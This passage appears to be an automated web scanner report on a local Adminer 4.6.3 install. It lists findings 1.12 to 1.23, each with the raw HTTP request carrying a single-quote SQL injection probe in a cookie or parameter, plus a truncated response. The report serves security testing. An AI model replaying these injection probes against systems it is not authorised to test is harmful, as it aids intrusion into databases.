Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MGI3M2NlZDJkZGY4YzhmNTI4MDlmZDI1ZDAzYzY4YWY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4493
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieM - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.12. http://localhost/adminer/adminer-4.6.3.php [adminer_sid cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The adminer_sid cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adminer_sid cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294'; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=1kecskm8kfkv29ijj9r4rthps3; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-Y2NiNzdkM2EzMjJmODAwYjRiNmQwMzQ3OGZjZWUyZmY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4522
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.13. http://localhost/adminer/adminer-4.6.3.php [auth%5bdb%5d parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5bdb%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5bdb%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Cookie: adminer_sid=cdq5g34md4d7cajnffbkmv81qn; adminer_key=0a9fa6db87f98aa295dd4ecf8667248d

auth%5bdriver%5d=server&auth%5bserver%5d=WVXmekzw&auth%5busername%5d=FsyZhLfc&auth%5bpassword%5d=p8G%21c2e%21P1&auth%5bdb%5d=VICYSKOs'

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:11:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:11:07 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=0a9fa6db87f98aa295dd4ecf8667248d; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NDIwNjMxYTU1MDVjOWZmOTQxNTM4YjQyNDI2YzY1YTQ=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4494
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - WVXmekzw - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.14. http://localhost/adminer/adminer-4.6.3.php [auth%5bdriver%5d parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5bdriver%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5bdriver%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_sid=if12n6mpoth7rrr8db2b98pbgd; adminer_key=ee5a97bb7d42e79ebb4dfad235644413

auth%5bdriver%5d=server'&auth%5bserver%5d=hvdhksIt&auth%5busername%5d=SvdSIQmY&auth%5bpassword%5d=g3P%21p0i%21F6&auth%5bdb%5d=qYkgBFYR&auth%5bpermanent%5d=1

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:02:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=c2VydmVyJw%3D%3D-aHZkaGtzSXQ%3D-U3ZkU0lRbVk%3D-cVlrZ0JGWVI%3D%3A6e7Uou0JbQpEG8uIZzC6UA%3D%3D; expires=Sat, 17 Nov 2018 21:02:24 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=ee5a97bb7d42e79ebb4dfad235644413; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTk1NGQ5MWY4MjYyODMwMGI5NzI0YmYxYTg0NjIyYTE=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4768
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.15. http://localhost/adminer/adminer-4.6.3.php [auth%5bpassword%5d parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5bpassword%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5bpassword%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Cookie: adminer_sid=cdq5g34md4d7cajnffbkmv81qn; adminer_key=0a9fa6db87f98aa295dd4ecf8667248d

auth%5bdriver%5d=server&auth%5bserver%5d=WVXmekzw&auth%5busername%5d=FsyZhLfc&auth%5bpassword%5d=p8G!c2e!P1'&auth%5bdb%5d=VICYSKOs

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:10:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:10:38 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=0a9fa6db87f98aa295dd4ecf8667248d; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-YmMwNGM4MmZmOTkxMGZkNDk4NWJkZTA2MzhiZmM2MGE=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4485
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - WVXmekzw - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.16. http://localhost/adminer/adminer-4.6.3.php [auth%5bpermanent%5d parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5bpermanent%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5bpermanent%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_sid=if12n6mpoth7rrr8db2b98pbgd; adminer_key=ee5a97bb7d42e79ebb4dfad235644413

auth%5bdriver%5d=server&auth%5bserver%5d=hvdhksIt&auth%5busername%5d=SvdSIQmY&auth%5bpassword%5d=g3P%21p0i%21F6&auth%5bdb%5d=qYkgBFYR&auth%5bpermanent%5d=1'

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:13:01 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:13:01 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=ee5a97bb7d42e79ebb4dfad235644413; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ZDgwOTRkM2VmZDc2NzQ5M2U1M2IyOGVmYTdmM2M4OGY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4492
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - hvdhksIt - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.17. http://localhost/adminer/adminer-4.6.3.php [auth%5bserver%5d parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5bserver%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5bserver%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_sid=bp3upadpsu2m2m0t3rkbiuh4ip; adminer_key=a29b0ef6b673e85bda436f5358e30b8b

auth%5bdriver%5d=server&auth%5bserver%5d=gPsfQieM'&auth%5busername%5d=wWXwJEEF&auth%5bpassword%5d=x6D%21r9q%21H5&auth%5bdb%5d=AhfDADgK&auth%5bpermanent%5d=1

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:04:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:04:04 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MmIxZWQ0OWVkYjYyZjdlNDUwM2ZkZDQyZTZlMmRkYzY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4508
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieM&#039; - Adminer</title>
<l
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.18. http://localhost/adminer/adminer-4.6.3.php [auth%5busername%5d parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5busername%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5busername%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Cookie: adminer_sid=cdq5g34md4d7cajnffbkmv81qn; adminer_key=0a9fa6db87f98aa295dd4ecf8667248d

auth%5bdriver%5d=server&auth%5bserver%5d=WVXmekzw&auth%5busername%5d=FsyZhLfc'&auth%5bpassword%5d=p8G%21c2e%21P1&auth%5bdb%5d=VICYSKOs

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:07:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:07:57 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=0a9fa6db87f98aa295dd4ecf8667248d; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NDMzM2Q5NGJkM2M0NmY0OWMyNzA3ZDJjN2EyZjY3NmQ=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4494
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - WVXmekzw - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.19. http://localhost/adminer/adminer-4.6.3.php [db parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The db parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the db parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK' HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=; adminer_lang=en

auth%5bdriver%5d=server&auth%5bserver%5d=XJQTysvL&auth%5busername%5d=kMlMpcXg&auth%5bpassword%5d=v5R%21k2f%21Q2&auth%5bdb%5d=FRepmkVM&auth%5bpermanent%5d=1

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:04:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:04:00 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:04:01 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NDMyNWMxZDRhMTBjY2UxOTljMTMyODgwZjM2MDBmNmQ=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4493
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - XJQTysvL - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.20. http://localhost/adminer/adminer-4.6.3.php [lang parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The lang parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the lang parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en'&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-YTE2MzliMzVjNzA5OGI0MjZlODhkMWZiNTBhODZhYWM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4325
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.21. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php?1'=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:06:55 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:06:55 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTM2ZDY4MzBjYTEyYjFjMjNhYTMwMjQxMDZhZTZhNTk=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4325
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.22. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en&token=240285%3a176068&1'=1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:06:20 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:06:20 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NGE1MDdhYTBlYzQ2MDZhZDliNDU1ZjEyODI3MGM4ZTk=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.23. http://localhost/adminer/adminer-4.6.3.php [server parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The server parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the server parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php?server=hvdhksIt'&username=SvdSIQmY&db=qYkgBFYR HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=hvdhksIt&username=SvdSIQmY&db=qYkgBFYR
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_key=ee5a97bb7d42e79ebb4dfad235644413; adminer_sid=tm6hb8tq45oqkfal3vj39svop6; adminer_permanent=; adminer_lang=en

auth%5bdriver%5d=server&auth%5bserver%5d=dAYPdYZc&auth%5busername%5d=WQrdyhEb&auth%5bpassword%5d=n0R%21m9v%21J1&auth%5bdb%5d=ctITZfwz&auth%5bpermanent%5d=1

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:02:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:02:31 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:02:31 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=ee5a97bb7d42e79ebb4dfad235644413; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MWU2MDUxMjZlOWYzZmU4YjNmMzg1NWQ0ZDM3MTRhYzU=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4493
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
